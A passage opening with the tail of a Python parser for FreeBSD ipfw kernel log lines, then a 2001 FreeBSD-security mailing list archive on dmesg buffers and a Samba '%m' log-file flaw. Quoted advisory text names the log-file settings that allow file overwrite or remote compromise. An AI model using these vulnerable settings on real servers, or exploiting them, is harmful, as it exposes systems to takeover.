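        (truncated if TAIL_RE.search(line) else other).append(line)
    return records, truncated, other


def summarize(records):
    """Count hits per (proto, dport); easier to read in a daily report than raw lines."""
    return Counter((r["proto"], r["dport"]) for r in records)


# Constructed excerpt of a dmesg buffer whose first line was cut by a wrap.
SAMPLE_DMESG = """\
5.255.255:137 in via xl1
ipfw: 300 Deny UDP 192.168.5.20:137 192.168.5.255:137 in via xl1
ipfw: 300 Deny UDP 192.168.5.21:137 192.168.5.255:137 in via xl1
ipfw: 300 Deny UDP 192.168.5.21:138 192.168.5.255:138 in via xl1
Connection attempt to TCP 10.1.2.3:111 from 10.9.8.7:4711
ipfw: 65000 Deny ICMP:8.0 10.9.8.7 10.1.2.3 in via xl0
xl1: promiscuous mode enabled
"""

if __name__ == "__main__":
    records, truncated, other = parse_kernel_log(SAMPLE_DMESG)
    for (proto, port), n in sorted(summarize(records).items(), key=str):
        print(f"{proto:<9} port {str(port):<6} {n}")
    print("truncated fragments (ring buffer wrapped):", truncated)
    print("unrelated kernel messages:", other)
```

The fragment classification is deliberately narrow: only a line whose tail looks like one of the two formats is called truncated, so a genuinely unknown message still shows up in `other` instead of being silently discarded.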
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 8:26:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from imr2.ericy.com (imr2.ericy.com [12.34.240.68]) by hub.freebsd.org (Postfix) with ESMTP id B50F137B407 for ; Thu, 28 Jun 2001 08:26:31 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca) Received: from mr6.exu.ericsson.se (mr6att.ericy.com [138.85.92.14]) by imr2.ericy.com (8.11.3/8.11.3) with ESMTP id f5SFQZB09507 for ; Thu, 28 Jun 2001 10:26:35 -0500 (CDT) Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr6.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f5SFQUF02973 for ; Thu, 28 Jun 2001 10:26:30 -0500 (CDT) Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f5SFQTG18130 for ; Thu, 28 Jun 2001 11:26:29 -0400 (EDT) Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id ; Thu, 28 Jun 2001 11:26:28 -0400 Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id NZTGB1MS; Thu, 28 Jun 2001 11:26:24 -0400 From: "Antoine Beaupre (LMC)" To: freebsd-security@FreeBSD.ORG Message-ID: <3B3B4C9E.5010800@lmc.ericsson.se> Date: Thu, 28 Jun 2001 11:26:22 -0400 Organization: LMC, Ericsson Research Canada User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.1) Gecko/20010607 X-Accept-Language: en,fr-CA,fr MIME-Version: 1.0 Subject: Re: security check output, kernel log message References: <1444.993740757@axl.seasidesoftware.co.za> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org 
I also had my share of "trouble" with that. Sometimes, it's strictly impossible to have the boot dmesg. The kernel dmesg buffer gets overflowed, this is understandable. But /var/log/dmesg.today *also* gets trashed.

Isn't there a nice little file somewhere that keeps *boot* (not console!) messages?

A.

Sheldon Hearn wrote:
> On Thu, 28 Jun 2001 15:45:29 +0200, Alexander Langer wrote:
>
>>>> 5.255.255:137 in via xl1
>>>
>>> What does this mean?
>>
>> That is a truncated log from another day.
>
> What I've wondered for a while is how to flush that out so I stop
> getting it in my daily security check output. I still have a load of
> 'em left over from when I turned log_in_vain on a few weeks ago.
>
> Ciao,
> Sheldon.

--
Antoine Beaupré
Jambala TCM team
Ericsson Canada inc.
mailto:antoine.beaupre@ericsson.ca

From owner-freebsd-security Thu Jun 28 10: 3: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 1F97237B414 for ; Thu, 28 Jun 2001 10:02:50 -0700 (PDT) (envelope-from ben@FreeBSD.org)
Received: from strontium.shef.vinosystems.com ([192.168.91.36] ident=root) by scientia.demon.co.uk with esmtp (Exim 3.30 #1) id 15Ff8k-000E1p-00; Thu, 28 Jun 2001 17:59:38 +0100
Received: (from ben@localhost) by strontium.shef.vinosystems.com (8.11.4/8.11.4) id f5SGxce91371; Thu, 28 Jun 2001 17:59:38 +0100 (BST) (envelope-from ben@FreeBSD.org)
X-Authentication-Warning: strontium.shef.vinosystems.com: ben set sender to ben@FreeBSD.org using -f
Date: Thu, 28 Jun 2001 17:59:38 +0100
From: Ben Smithurst
To: "Antoine Beaupre (LMC)"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: security check output, kernel log message
Message-ID:
<20010628175938.H83829@strontium.shef.vinosystems.com> References: <1444.993740757@axl.seasidesoftware.co.za> <3B3B4C9E.5010800@lmc.ericsson.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3B3B4C9E.5010800@lmc.ericsson.se> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Antoine Beaupre (LMC) wrote: > I also had my share of "trouble" with that. Sometimes, it's strictly > impossible to have boot dmesg. The kernel dmesg buffer gets overflown, > this is understandable. But /var/log/dmesg.today *also* gets trashed. > > isn't there a nice little file somewhere that keeps *boot* (not > console!) messages? /var/run/dmesg.boot -- Ben Smithurst / ben@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 12:25:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from stimpy.net (adsl-63-193-11-3.dsl.snfc21.pacbell.net [63.193.11.3]) by hub.freebsd.org (Postfix) with ESMTP id 86EBE37B407; Thu, 28 Jun 2001 12:25:31 -0700 (PDT) (envelope-from jgross@stimpy.net) Received: by stimpy.net (Postfix, from userid 314) id 4C88F300EB; Thu, 28 Jun 2001 12:25:19 -0700 (PDT) Date: Thu, 28 Jun 2001 12:25:19 -0700 From: Joe Gross To: Ben Smithurst Cc: "Antoine Beaupre (LMC)" , freebsd-security@FreeBSD.ORG Subject: Re: security check output, kernel log message Message-ID: <20010628122519.A79443@felix.stimpy.net> References: <1444.993740757@axl.seasidesoftware.co.za> <3B3B4C9E.5010800@lmc.ericsson.se> <20010628175938.H83829@strontium.shef.vinosystems.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20010628175938.H83829@strontium.shef.vinosystems.com>; from ben@FreeBSD.org on Thu, Jun 28, 2001 at 05:59:38PM 
+0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 28, 2001 at 05:59:38PM +0100, Ben Smithurst wrote: > > isn't there a nice little file somewhere that keeps *boot* (not > > console!) messages? > > /var/run/dmesg.boot (quickly drifting OT) From /etc/rc: # Keep a copy of the boot messages around dmesg >/var/run/dmesg.boot Unfortunately in my case the dmesg buffer is too small so I miss all the meaty early boot messages. Is this a settable option or is there some other way to have all the boot messages saved without a serial console? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 12:35: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 2C07A37B405 for ; Thu, 28 Jun 2001 12:35:00 -0700 (PDT) (envelope-from ben@FreeBSD.org) Received: from strontium.shef.vinosystems.com ([192.168.91.36] ident=root) by scientia.demon.co.uk with esmtp (Exim 3.30 #1) id 15FhZ4-000Hzm-00; Thu, 28 Jun 2001 20:34:58 +0100 Received: (from ben@localhost) by strontium.shef.vinosystems.com (8.11.4/8.11.4) id f5SJYvh80266; Thu, 28 Jun 2001 20:34:57 +0100 (BST) (envelope-from ben@FreeBSD.org) X-Authentication-Warning: strontium.shef.vinosystems.com: ben set sender to ben@FreeBSD.org using -f Date: Thu, 28 Jun 2001 20:34:57 +0100 From: Ben Smithurst To: Joe Gross Cc: freebsd-security@FreeBSD.ORG Subject: Re: security check output, kernel log message Message-ID: <20010628203457.B57299@strontium.shef.vinosystems.com> References: <1444.993740757@axl.seasidesoftware.co.za> <3B3B4C9E.5010800@lmc.ericsson.se> <20010628175938.H83829@strontium.shef.vinosystems.com> <20010628122519.A79443@felix.stimpy.net> Mime-Version: 1.0 Content-Type: 
text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010628122519.A79443@felix.stimpy.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Joe Gross wrote: > (quickly drifting OT) > >> From /etc/rc: > > # Keep a copy of the boot messages around > dmesg >/var/run/dmesg.boot > > Unfortunately in my case the dmesg buffer is too small so I miss all the > meaty early boot messages. Is this a settable option or is there some other > way to have all the boot messages saved without a serial console? This might be what you want, I've never tried it though: # Size of the kernel message buffer. Should be N * pagesize. options MSGBUF_SIZE=40960 -- Ben Smithurst / ben@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 16:15: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from comp1.mastery.ca (comp1.mastery.ca [209.202.88.60]) by hub.freebsd.org (Postfix) with ESMTP id CAA7D37B409 for ; Thu, 28 Jun 2001 16:14:59 -0700 (PDT) (envelope-from rmasse@mastery.ca) Received: from 78kw954 (dyn216-8-131-5.ADSL.mnsi.net [216.8.131.5]) (authenticated) by comp1.mastery.ca (8.11.3/8.11.1) with ESMTP id f5SNEwQ06572 for ; Thu, 28 Jun 2001 19:14:58 -0400 (EDT) (envelope-from rmasse@mastery.ca) Message-ID: <004b01c10027$ca9b8980$3200a8c0@Home> From: "Ryan Masse" To: "FreeBSD-Security" Subject: samba vulnerability Date: Thu, 28 Jun 2001 19:12:22 -0400 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org How come there 
hasn't been a security advisory about the latest possible remote root compromise found in all samba versions prior to 2.0.10?

http://us1.samba.org/samba/whatsnew/macroexploit.html

Ryan

From owner-freebsd-security Thu Jun 28 16:38:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from aristotle.tamu.edu (Aristotle.tamu.edu [165.91.161.90]) by hub.freebsd.org (Postfix) with ESMTP id 5ABB037B403 for ; Thu, 28 Jun 2001 16:38:54 -0700 (PDT) (envelope-from rasmith@aristotle.tamu.edu)
Received: from aristotle.tamu.edu (IDENT:rasmith@localhost [127.0.0.1]) by aristotle.tamu.edu (8.9.3/8.8.7) with ESMTP id SAA31931 for ; Thu, 28 Jun 2001 18:38:53 -0500
Message-Id: <200106282338.SAA31931@aristotle.tamu.edu>
To: freebsd-security@FreeBSD.ORG
Subject: Re: samba vulnerability
In-Reply-To: Your message of "Thu, 28 Jun 2001 19:12:22 EDT." <004b01c10027$ca9b8980$3200a8c0@Home>
Mime-Version: 1.0 (generated by tm-edit 7.106)
Content-Type: text/plain; charset=US-ASCII
Date: Thu, 28 Jun 2001 18:38:53 -0500
From: Robin Smith
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

>> Ryan Masse wrote:
> How come there hasn't been a security advisory about the
> latest possible remote root compromise found in all samba
> versions prior to 2.0.10?

There has been, and the samba port installs by default with log file names of the form "log.%m".
From owner-freebsd-security Thu Jun 28 17:31:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from comp1.mastery.ca (comp1.mastery.ca [209.202.88.60]) by hub.freebsd.org (Postfix) with ESMTP id AA29037B409 for ; Thu, 28 Jun 2001 17:31:08 -0700 (PDT) (envelope-from mail@max-info.net)
Received: from 78kw954 (dyn216-8-131-5.ADSL.mnsi.net [216.8.131.5]) (authenticated) by comp1.mastery.ca (8.11.3/8.11.1) with ESMTP id f5T0TbQ06685; Thu, 28 Jun 2001 20:29:41 -0400 (EDT) (envelope-from mail@max-info.net)
Message-ID: <005e01c10032$374ad360$3200a8c0@Home>
From: "Ryan Masse"
To: "Robin Smith"
Cc: "FreeBSD-Security"
References: <200106282338.SAA31931@aristotle.tamu.edu>
Subject: Re: samba vulnerability
Date: Thu, 28 Jun 2001 20:26:56 -0400
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

There has been an advisory?

> >> Ryan Masse wrote:
> > How come there hasn't been a security advisory about the
> > latest possible remote root compromise found in all samba
> > versions prior to 2.0.10?
>
> There has been, and the samba port installs by default with
> log file names of the form "log.%m".
> > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 17:52:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from aristotle.tamu.edu (Aristotle.tamu.edu [165.91.161.90]) by hub.freebsd.org (Postfix) with ESMTP id 9C4CC37B409 for ; Thu, 28 Jun 2001 17:52:37 -0700 (PDT) (envelope-from rasmith@aristotle.tamu.edu) Received: from aristotle.tamu.edu (IDENT:rasmith@localhost [127.0.0.1]) by aristotle.tamu.edu (8.9.3/8.8.7) with ESMTP id TAA32034; Thu, 28 Jun 2001 19:52:34 -0500 Message-Id: <200106290052.TAA32034@aristotle.tamu.edu> To: "Ryan Masse" Cc: "FreeBSD-Security" Subject: Re: samba vulnerability In-Reply-To: Message from "Ryan Masse" of "Thu, 28 Jun 2001 20:26:56 EDT." <005e01c10032$374ad360$3200a8c0@Home> Mime-Version: 1.0 (generated by tm-edit 7.106) Content-Type: text/plain; charset=US-ASCII Date: Thu, 28 Jun 2001 19:52:34 -0500 From: Robin Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Ryan" == Ryan Masse writes: Ryan> There has been an advisory? Well, I may be confused: I got a message from somewhere a week or two ago concerning this logfile naming problem, but the only recent advisory I can find concerning samba is: FreeBSD-SA-01:36.samba.asc which concerns a race condition exploit in files in /tmp . I do know that I received a warning from somewhere about the %m.log exploit, but now I wonder where it was. 
Robin Smith To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 19:52:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from boggy.acest.tutrp.tut.ac.jp (boggy.acest.tutrp.tut.ac.jp [133.15.67.40]) by hub.freebsd.org (Postfix) with ESMTP id D8B1637B406 for ; Thu, 28 Jun 2001 19:52:24 -0700 (PDT) (envelope-from nakaji@tutrp.tut.ac.jp) Received: from boggy.acest.tutrp.tut.ac.jp (localhost [127.0.0.1]) by boggy.acest.tutrp.tut.ac.jp (8.11.2/8.11.3) with ESMTP id f5T2qMH30519 for ; Fri, 29 Jun 2001 11:52:22 +0900 (JST) To: freebsd-security@freebsd.org Subject: Re: samba vulnerability References: <200106290052.TAA32034@aristotle.tamu.edu> MIME-Version: 1.0 (generated by SEMI 1.14.3 - "Ushinoya") Content-Type: text/plain; charset=US-ASCII From: NAKAJI Hiroyuki Date: 29 Jun 2001 11:52:22 +0900 In-Reply-To: <200106290052.TAA32034@aristotle.tamu.edu> (Robin Smith's message of "29 Jun 2001 02:52:55 +0200") Message-ID: <87u210ngk9.fsf@boggy.acest.tutrp.tut.ac.jp> Lines: 10 User-Agent: T-gnus/6.15.3 (based on Oort Gnus v0.03) (revision 02) SEMI/1.14.3 (Ushinoya) FLIM/1.14.3 (=?ISO-8859-4?Q?Unebigory=F2mae?=) APEL/10.3 Emacs/20.7 (i386--freebsd) MULE/4.0 (HANANOEN) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> In <200106290052.TAA32034@aristotle.tamu.edu> >>>>> rasmith@aristotle.tamu.edu (Robin Smith) wrote: RS> the %m.log exploit, but now I wonder where it was. http://lists.samba.org/pipermail/samba-announce/2001-June/000054.html Is this what you read? 
-- NAKAJI Hiroyuki To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 20:37:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from panda.freebsdsystems.com (panda.freebsdsystems.com [216.126.95.28]) by hub.freebsd.org (Postfix) with SMTP id 57B7337B409 for ; Thu, 28 Jun 2001 20:37:34 -0700 (PDT) (envelope-from lnb@freebsdsystems.com) Received: (qmail 31850 invoked by uid 89); 29 Jun 2001 03:37:29 -0000 Message-ID: <20010629033729.31849.qmail@panda.freebsdsystems.com> References: <200106290052.TAA32034@aristotle.tamu.edu> <87u210ngk9.fsf@boggy.acest.tutrp.tut.ac.jp> In-Reply-To: <87u210ngk9.fsf@boggy.acest.tutrp.tut.ac.jp> From: "Lanny Baron" To: NAKAJI Hiroyuki Cc: freebsd-security@freebsd.org Subject: Re: samba vulnerability Date: Fri, 29 Jun 2001 03:37:29 GMT Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Sender: lnb@freebsdsystems.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I am the Canadian mirror for Samba.org and the warning is right on the main page, under NEWS. It's the macro %m and it warns: The security hole occurs when a log file option like the following is used: log file = /var/log/samba/%m.log In that case the attacker can use a locally created symbolic link to overwrite any file on the system. This requires local access to the server. If your Samba configuration has something like the following: log file = /var/log/samba/%m Then the attacker could successfully compromise your server remotely as no symbolic link is required. This type of configuration is very rare. 
The most commonly used log file configuration containing %m is the distributed in the sample configuration file that comes with Samba: log file = /var/log/samba/log.%m in that case your machine is not vulnerable to this attack unless you happen to have a subdirectory in /var/log/samba/ which starts with the prefix "log." Regards, Lanny NAKAJI Hiroyuki writes: >>>>>> In <200106290052.TAA32034@aristotle.tamu.edu> >>>>>> rasmith@aristotle.tamu.edu (Robin Smith) wrote: > > RS> the %m.log exploit, but now I wonder where it was. > > http://lists.samba.org/pipermail/samba-announce/2001-June/000054.html > > Is this what you read? > -- > NAKAJI Hiroyuki > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= Lanny Baron servers with the power to Serve http://www.FreeBSDsystems.com 1.877.963.1900 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 21:11:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.allyster.com (fw.allyster.com [194.202.29.33]) by hub.freebsd.org (Postfix) with SMTP id 3450A37B40A for ; Thu, 28 Jun 2001 21:11:56 -0700 (PDT) (envelope-from jslivko@jslivko.org) Received: (qmail 31345 invoked from network); 29 Jun 2001 01:26:50 -0000 Received: from mail.allyster.com (jslivko@194.202.29.35) by mail.allyster.com with SMTP; 29 Jun 2001 01:26:50 -0000 Date: Fri, 29 Jun 2001 02:26:50 +0100 (BST) From: "Jonathan M. 
Slivko" X-Sender: jslivko@localhost.localdomain To: FreeBSD Security Mailing List Subject: Hitlist for Security Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, Has anyone seen a URL or a book that has a hitlist of common things that need to be patched when installing a new system from scratch? Please e-mail me and let me know. Thanks! -- Jonathan /--------------------------------------------------------------\ Jonathan Slivko -- Black Lotus Comm. -- jslivko@jslivko.org www.jslivko.org - www.blacklotus.net - www.freebsd.org Phone: (212) 663-1109 -- Pager: (917) 388-5304 FreeBSD: The Power to Serve! \--------------------------------------------------------------/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 21:16:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from comp1.mastery.ca (comp1.mastery.ca [209.202.88.60]) by hub.freebsd.org (Postfix) with ESMTP id F202C37B40A for ; Thu, 28 Jun 2001 21:16:54 -0700 (PDT) (envelope-from mail@max-info.net) Received: from 78kw954 (dyn216-8-131-5.ADSL.mnsi.net [216.8.131.5]) (authenticated) by comp1.mastery.ca (8.11.3/8.11.1) with ESMTP id f5T4FvQ07036; Fri, 29 Jun 2001 00:15:58 -0400 (EDT) (envelope-from mail@max-info.net) Message-ID: <014601c10051$ca88d2c0$3200a8c0@Home> From: "Ryan Masse" To: "Lanny Baron" Cc: "FreeBSD-Security" References: <200106290052.TAA32034@aristotle.tamu.edu> <87u210ngk9.fsf@boggy.acest.tutrp.tut.ac.jp> <20010629033729.31849.qmail@panda.freebsdsystems.com> Subject: Re: samba vulnerability Date: Fri, 29 Jun 2001 00:13:01 -0400 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 
Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i'm sure we are all aware of the problem.. my original question was how come this didn't make the freebsd security advisory? Ryan > Hi, > I am the Canadian mirror for Samba.org and the warning is right on the main > page, under NEWS. It's the macro %m and it warns: > > The security hole occurs when a log file option like the following is > used: > > log file = /var/log/samba/%m.log > > In that case the attacker can use a locally created symbolic link to > overwrite any file on the system. This requires local access to the > server. > > If your Samba configuration has something like the following: > > log file = /var/log/samba/%m > > Then the attacker could successfully compromise your server remotely > as no symbolic link is required. This type of configuration is very > rare. > > The most commonly used log file configuration containing %m is the > distributed in the sample configuration file that comes with Samba: > > log file = /var/log/samba/log.%m > > in that case your machine is not vulnerable to this attack unless you > happen to have a subdirectory in /var/log/samba/ which starts with the > prefix "log." > > Regards, > Lanny > > NAKAJI Hiroyuki writes: > > >>>>>> In <200106290052.TAA32034@aristotle.tamu.edu> > >>>>>> rasmith@aristotle.tamu.edu (Robin Smith) wrote: > > > > RS> the %m.log exploit, but now I wonder where it was. > > > > http://lists.samba.org/pipermail/samba-announce/2001-June/000054.html > > > > Is this what you read? 
> > -- > > NAKAJI Hiroyuki > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= > Lanny Baron > servers with the power to Serve > http://www.FreeBSDsystems.com > 1.877.963.1900 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 21:31:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from panda.freebsdsystems.com (panda.freebsdsystems.com [216.126.95.28]) by hub.freebsd.org (Postfix) with SMTP id E715437B409 for ; Thu, 28 Jun 2001 21:31:20 -0700 (PDT) (envelope-from lnb@freebsdsystems.com) Received: (qmail 32535 invoked by uid 89); 29 Jun 2001 04:31:20 -0000 Message-ID: <20010629043120.32534.qmail@panda.freebsdsystems.com> References: <200106290052.TAA32034@aristotle.tamu.edu> <87u210ngk9.fsf@boggy.acest.tutrp.tut.ac.jp> <20010629033729.31849.qmail@panda.freebsdsystems.com> <014601c10051$ca88d2c0$3200a8c0@Home> In-Reply-To: <014601c10051$ca88d2c0$3200a8c0@Home> From: "Lanny Baron" To: "Ryan Masse" Cc: "FreeBSD-Security" Subject: Re: samba vulnerability Date: Fri, 29 Jun 2001 04:31:20 GMT Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Sender: lnb@freebsdsystems.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Ryan, I cannot answer that. I am not a part of The FreeBSD Project Inc. But your question is well taken. In fact Ryan, it was your posting that led me to our mirror of Samba (http://ca.samba.org/samba/samba.html) to see what the Samba team had pointed out. 
What this really shows is, how well the FreeBSD community works. It's just people like you Ryan, and others that keep other people abreast of things. Regards, Lanny Ryan Masse writes: > i'm sure we are all aware of the problem.. my original question was how come > this didn't make the freebsd security advisory? > > Ryan > >> Hi, >> I am the Canadian mirror for Samba.org and the warning is right on the > main >> page, under NEWS. It's the macro %m and it warns: >> >> The security hole occurs when a log file option like the following is >> used: >> >> log file = /var/log/samba/%m.log >> >> In that case the attacker can use a locally created symbolic link to >> overwrite any file on the system. This requires local access to the >> server. >> >> If your Samba configuration has something like the following: >> >> log file = /var/log/samba/%m >> >> Then the attacker could successfully compromise your server remotely >> as no symbolic link is required. This type of configuration is very >> rare. >> >> The most commonly used log file configuration containing %m is the >> distributed in the sample configuration file that comes with Samba: >> >> log file = /var/log/samba/log.%m >> >> in that case your machine is not vulnerable to this attack unless you >> happen to have a subdirectory in /var/log/samba/ which starts with the >> prefix "log." >> >> Regards, >> Lanny >> >> NAKAJI Hiroyuki writes: >> >> >>>>>> In <200106290052.TAA32034@aristotle.tamu.edu> >> >>>>>> rasmith@aristotle.tamu.edu (Robin Smith) wrote: >> > >> > RS> the %m.log exploit, but now I wonder where it was. >> > >> > http://lists.samba.org/pipermail/samba-announce/2001-June/000054.html >> > >> > Is this what you read? 
>> > -- >> > NAKAJI Hiroyuki >> > >> > To Unsubscribe: send mail to majordomo@FreeBSD.org >> > with "unsubscribe freebsd-security" in the body of the message >> >> >> >> ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= >> Lanny Baron >> servers with the power to Serve >> http://www.FreeBSDsystems.com >> 1.877.963.1900 >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= Lanny Baron servers with the power to Serve http://www.FreeBSDsystems.com 1.877.963.1900 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 23: 7:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from radix.cryptio.net (radix.cryptio.net [199.181.107.213]) by hub.freebsd.org (Postfix) with ESMTP id 663BA37B401 for ; Thu, 28 Jun 2001 23:07:13 -0700 (PDT) (envelope-from emechler@radix.cryptio.net) Received: (from emechler@localhost) by radix.cryptio.net (8.11.3/8.11.3) id f5T676912314; Thu, 28 Jun 2001 23:07:06 -0700 (PDT) (envelope-from emechler) Date: Thu, 28 Jun 2001 23:07:06 -0700 From: Erick Mechler To: "Jonathan M. Slivko" Cc: FreeBSD Security Mailing List Subject: Re: Hitlist for Security Message-ID: <20010628230706.C10490@techometer.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from Jonathan M. Slivko on Fri, Jun 29, 2001 at 02:26:50AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I would start with the security advisories (www.freebsd.org/security). 
